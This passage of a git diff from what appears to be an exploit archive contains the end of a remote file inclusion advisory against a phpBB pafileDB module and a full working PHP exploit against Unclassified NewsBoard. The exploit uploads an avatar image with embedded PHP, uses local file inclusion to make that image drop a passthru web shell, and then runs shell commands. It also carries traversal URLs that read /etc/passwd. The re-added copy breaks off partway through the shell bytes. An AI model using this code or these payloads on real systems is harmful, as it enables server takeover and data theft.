+$link_language = 'lang_english';
+    include( $module_root_path . 'language/' . $link_language . '/lang_pafiledb.' . $phpEx );
+---------------------------------------------------------------------
+
+http://www.site.com/[phpBBpath]/[pafiledbpath]/includes/pafiledb_constants.php?module_root_path=http://[attacker]
+
+by Darkfire and IR4DEX GROUP
+Greetz: Smurf_RedHat :: V0lks
+
+# milw0rm.com [2006-05-09]
diff --git a/platforms/php/webapps/1777.php b/platforms/php/webapps/1777.php
index c24afe0cd..1651ae809 100755
--- a/platforms/php/webapps/1777.php
+++ b/platforms/php/webapps/1777.php
@@ -1,382 +1,382 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "Unclassified NewsBoard <= 1.6.1 patch 1 ABBC[Config][smileset] arbitrary\r\n";
-echo "local inclusion\r\n";
-echo "by rgod rgod@autistici.org\r\n";
-echo "site: http://retrogod.altervista.org\r\n\r\n";
-echo "works with register_globals = On & magic_quotes_gpc = Off\r\n\r\n";
-
-/*
-1.5.3 patch level 4 and below, exploit is a bit different, ex:
- 
-http://[target]/[path]/bb_lib/abbc.css.php?design_path=../../../../../../../../../etc/passwd%00
-*/
-
-if ($argc<6) {
-echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to UNB\r\n";
-echo "cmd:       a shell command\r\n";
-echo "user/pass: you need a valid user account to upload files\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /unb/ your_username password cat ./../board.conf.php\r\n";
-echo "php ".$argv[0]." localhost /unb/ your_username password ls -la -p81\r\n";
-echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n";
-die;
-}
-
-/* software site: http://newsboard.unclassified.de/
-
-   description: "The Unclassified NewsBoard (short UNB) is an open-source,
-   PHP-based internet bulletin board system"
-
-   vulnerable code in unb_lib/abbc.conf.php at lines 635-641:
-
-   ...
-   // Smiley Definitions
-  if ($ABBC['Config']['smileset'])
-  {
-	$ABBC['Config']['smilepath'] = dirname(__FILE__) . '/designs/_smile/' . $ABBC['Config']['smileset'] . '/';
-	$ABBC['Config']['smileurl'] = $UNB['LibraryURL'] . 'designs/_smile/' . $ABBC['Config']['smileset'] . '/';
-	@include($ABBC['Config']['smilepath'] . 'config.php');
-  }
-  ...
-
-  $ABBC['Config']['smileset'] var is not initialized before to be used to include
-  files. You cannot have access to this code directly but in unb_lib/abbc.css.php
-  at line 16 we have:
-
-  ...
-  require('abbc.conf.php');
-  ...
-
-  this script is not protected by the unb_lib folder .htaccess file:
-
-  # Don't allow direct PHP requests in this directory
-  <Files *.inc.php>
-	Order allow,deny
-	Deny from all
-  </Files>
-  <Files *.lib.php>
-	Order allow,deny
-	Deny from all
-  </Files>
-
-  so, if register_globals = On & magic_quotes_gpc = Off, you can include files
-  from local resources, poc:
-
-  http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../../../../../../../../etc/passwd%00
-  http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../upload/avatar_[user_id].jpeg%00&cmd=ls%20-la
-  http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../upload/photo_[user_id].jpeg%00&cmd=ls%20-la
-
-  this script try to include an avatar or photo with malicious php code
-  inside, you need a valid account to upload files
-
-									      */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$username=$argv[3];
-$pass=$argv[4];
-$cmd="";$port=80;$proxy="";
-for ($i=5; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-echo "step 0 -> check if suntzu.php is already installed...\r\n";
-$packet ="GET ".$p."unb_lib/suntzu.php HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: cmd=".$cmd.";\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-if (strstr($html,"56789"))
-{
-  echo "Exploit succeeded...";
-  $temp=explode("56789",$html);
-  die("\r\n".$temp[1]."\r\n");
-}
-
-echo "step 1 -> login...\r\n";
-$data ="LoginName=".urlencode(trim($username));
-$data.="&LoginPassword=".urlencode(trim($pass));
-$packet="POST ".$p."forum.php?req=setuser&module=main HTTP/1.0\r\n";
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-$temp=explode("Set-Cookie: ",$html);
-$temp2=explode(' ',$temp[1]);
-$cookie=$temp2[0];
-$temp2=explode(' ',$temp[2]);
-$cookie.=" ".$temp2[0];
-echo 'Your cookie: '.$cookie."\r\n";
-$temp=explode("=",$cookie);
-$temp2=explode("+",$temp[2]);
-$id=$temp2[0];
-echo "User Id -> ".$id."\r\n";
-
-echo "step 2 -> upload a malicious avatar with php code inside...\r\n";
-$shell=
-chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0x07).chr(0x3c).chr(0x3f).
-chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70).
-chr(0x3d).chr(0x66).chr(0x6f).chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22).
-chr(0x73).chr(0x75).chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).
-chr(0x68).chr(0x70).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).chr(0x22).chr(0x29).
-chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).chr(0x74).chr(0x73).
-chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).chr(0x3c).chr(0x3f).
-chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).
-chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74).
-chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x73).
-chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).chr(0x5f).
-chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).chr(0x29).
-chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).chr(0x74).
-chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(0x71).
-chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).chr(0x70).
-chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x5c).chr(0x24).
-chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).
-chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).chr(0x72).
-chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65).
-chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).
-chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).
-chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).
-chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x3b).chr(0x70).chr(0x61).
-chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c).
-chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).
-chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65).
-chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x35).chr(0x36).chr(0x37).chr(0x38).
-chr(0x39).chr(0x3b).chr(0x3f).chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d).
-chr(0x0a).chr(0x66).chr(0x63).chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28).
-chr(0x24).chr(0x66).chr(0x70).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63).
-chr(0x68).chr(0x6d).chr(0x6f).chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75).
-chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).
-chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).chr(0x3b).chr(0x0d).
-chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).
-chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00).
-chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00).
-chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).
-chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff).
-chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01).
-chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03).
-chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08).
-chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4).
-chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).chr(0xc4).chr(0x00).
-chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).
-chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03).
-chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f).
-chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).chr(0xd9).chr(0x00);
-
-/*
-this image has this code inside as EXIF metadata content
-<?php
-$fp=fopen("suntzu.php","w");
-fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>");
-fclose($fp);
-chmod("suntzu.php",777);
-?>
-*/
-
-$data='-----------------------------7d614f2d12043e
-Content-Disposition: form-data; name="action"
-
-edit
------------------------------7d614f2d12043e
-Content-Disposition: form-data; name="id"
-
-'.$id.'
------------------------------7d614f2d12043e
-Content-Disposition: form-data; name="cat"
-
-postoptions
------------------------------7d614f2d12043e
-Content-Disposition: form-data; name="Signature"
-
-
------------------------------7d614f2d12043e
-Content-Disposition: form-data; name="avatar"
-
-1
------------------------------7d614f2d12043e
-Content-Disposition: form-data; name="avatarfile"; filename="suntzu.jpeg"
-Content-Type: image/pjpeg
-
-'.$shell.'
------------------------------7d614f2d12043e
-Content-Disposition: form-data; name="avatarurl"
-
-
------------------------------7d614f2d12043e
-Content-Disposition: form-data; name="photofile"; filename="suntzoi.jpeg"
-Content-Type: image/pjpeg
-
-'.$shell.'
------------------------------7d614f2d12043e
-Content-Disposition: form-data; name="photourl"
-
-
------------------------------7d614f2d12043e
-Content-Disposition: form-data; name="photo"
-
-1
------------------------------7d614f2d12043e
-Content-Disposition: form-data; name="Save"
-
-Save
------------------------------7d614f2d12043e--
-';
-
-$packet ="POST ".$p."forum.php?req=cp HTTP/1.0\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d614f2d12043e\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Accept-Encoding: gzip, deflate\r\n";
-$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Keep-Alive\r\n";
-$packet.="Cache-Control: no-cache\r\n";
-$packet.="Cookie: ".$cookie."\r\n\r\n";
-$packet.=$data;
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-
-echo "step 3 -> try to include avatar or photo...\r\n";
-$xpl=array(
-	   urlencode("../../upload/avatar_".$id.".jpeg".chr(0x00)),
-	   urlencode("../../upload/photo_".$id.".jpeg".chr(0x00))
-	  );
-
-for ($i=0; $i<=count($xpl)-1; $i++)
-{
-  $packet ="GET ".$p."unb_lib/abbc.css.php HTTP/1.0\r\n";
-  $packet.="Host: ".$host."\r\n";
-  $packet.="Cookie: ABBC[Config][smileset]=".$xpl[$i]."; \r\n"; //pass evil var through cookies
-  $packet.="Connection: Close\r\n\r\n";
-  $packet.=$data;
-  #debug
-  #echo quick_dump($packet);
-  sendpacketii($packet);
-}
-
-echo "step 4 -> Launch commands...\r\n";
-$packet ="GET ".$p."unb_lib/suntzu.php HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Cookie: cmd=".$cmd.";\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-if (strstr($html,"56789"))
-{
-  echo "Exploit succeeded...";
-  $temp=explode("56789",$html);
-  die("\r\n".$temp[1]."\r\n");
-}
-//if you are here...
-echo "Exploit failed...";
-?>
-
-# milw0rm.com [2006-05-11]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "Unclassified NewsBoard <= 1.6.1 patch 1 ABBC[Config][smileset] arbitrary\r\n";
+echo "local inclusion\r\n";
+echo "by rgod rgod@autistici.org\r\n";
+echo "site: http://retrogod.altervista.org\r\n\r\n";
+echo "works with register_globals = On & magic_quotes_gpc = Off\r\n\r\n";
+
+/*
+1.5.3 patch level 4 and below, exploit is a bit different, ex:
+ 
+http://[target]/[path]/bb_lib/abbc.css.php?design_path=../../../../../../../../../etc/passwd%00
+*/
+
+if ($argc<6) {
+echo "Usage: php ".$argv[0]." host path user pass cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to UNB\r\n";
+echo "cmd:       a shell command\r\n";
+echo "user/pass: you need a valid user account to upload files\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /unb/ your_username password cat ./../board.conf.php\r\n";
+echo "php ".$argv[0]." localhost /unb/ your_username password ls -la -p81\r\n";
+echo "php ".$argv[0]." localhost / your_username password ls -la -P1.1.1.1:80\r\n\r\n";
+die;
+}
+
+/* software site: http://newsboard.unclassified.de/
+
+   description: "The Unclassified NewsBoard (short UNB) is an open-source,
+   PHP-based internet bulletin board system"
+
+   vulnerable code in unb_lib/abbc.conf.php at lines 635-641:
+
+   ...
+   // Smiley Definitions
+  if ($ABBC['Config']['smileset'])
+  {
+	$ABBC['Config']['smilepath'] = dirname(__FILE__) . '/designs/_smile/' . $ABBC['Config']['smileset'] . '/';
+	$ABBC['Config']['smileurl'] = $UNB['LibraryURL'] . 'designs/_smile/' . $ABBC['Config']['smileset'] . '/';
+	@include($ABBC['Config']['smilepath'] . 'config.php');
+  }
+  ...
+
+  $ABBC['Config']['smileset'] var is not initialized before to be used to include
+  files. You cannot have access to this code directly but in unb_lib/abbc.css.php
+  at line 16 we have:
+
+  ...
+  require('abbc.conf.php');
+  ...
+
+  this script is not protected by the unb_lib folder .htaccess file:
+
+  # Don't allow direct PHP requests in this directory
+  <Files *.inc.php>
+	Order allow,deny
+	Deny from all
+  </Files>
+  <Files *.lib.php>
+	Order allow,deny
+	Deny from all
+  </Files>
+
+  so, if register_globals = On & magic_quotes_gpc = Off, you can include files
+  from local resources, poc:
+
+  http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../../../../../../../../etc/passwd%00
+  http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../upload/avatar_[user_id].jpeg%00&cmd=ls%20-la
+  http://[target]/[path]/unb_lib/abbc.css.php?ABBC[Config][smileset]=../../upload/photo_[user_id].jpeg%00&cmd=ls%20-la
+
+  this script try to include an avatar or photo with malicious php code
+  inside, you need a valid account to upload files
+
+									      */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$username=$argv[3];
+$pass=$argv[4];
+$cmd="";$port=80;$proxy="";
+for ($i=5; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+echo "step 0 -> check if suntzu.php is already installed...\r\n";
+$packet ="GET ".$p."unb_lib/suntzu.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: cmd=".$cmd.";\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+if (strstr($html,"56789"))
+{
+  echo "Exploit succeeded...";
+  $temp=explode("56789",$html);
+  die("\r\n".$temp[1]."\r\n");
+}
+
+echo "step 1 -> login...\r\n";
+$data ="LoginName=".urlencode(trim($username));
+$data.="&LoginPassword=".urlencode(trim($pass));
+$packet="POST ".$p."forum.php?req=setuser&module=main HTTP/1.0\r\n";
+$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+$temp=explode("Set-Cookie: ",$html);
+$temp2=explode(' ',$temp[1]);
+$cookie=$temp2[0];
+$temp2=explode(' ',$temp[2]);
+$cookie.=" ".$temp2[0];
+echo 'Your cookie: '.$cookie."\r\n";
+$temp=explode("=",$cookie);
+$temp2=explode("+",$temp[2]);
+$id=$temp2[0];
+echo "User Id -> ".$id."\r\n";
+
+echo "step 2 -> upload a malicious avatar with php code inside...\r\n";
+$shell=
+chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0x07).chr(0x3c).chr(0x3f).
+chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70).
+chr(0x3d).chr(0x66).chr(0x6f).chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22).
+chr(0x73).chr(0x75).chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).
+chr(0x68).chr(0x70).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).chr(0x22).chr(0x29).
+chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).chr(0x74).chr(0x73).
+chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).chr(0x3c).chr(0x3f).
+chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).chr(0x72).chr(0x6f).
+chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74).
+chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x73).
+chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).chr(0x5f).
+chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).chr(0x29).
+chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).chr(0x74).
+chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(0x71).
+chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).chr(0x70).
+chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x5c).chr(0x24).
+chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).
+chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).chr(0x72).
+chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65).
+chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).
+chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).
+chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20).
+chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x3b).chr(0x70).chr(0x61).
+chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c).
+chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).
+chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65).
+chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x35).chr(0x36).chr(0x37).chr(0x38).
+chr(0x39).chr(0x3b).chr(0x3f).chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d).
+chr(0x0a).chr(0x66).chr(0x63).chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28).
+chr(0x24).chr(0x66).chr(0x70).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63).
+chr(0x68).chr(0x6d).chr(0x6f).chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75).
+chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70).
+chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).chr(0x3b).chr(0x0d).
+chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a).
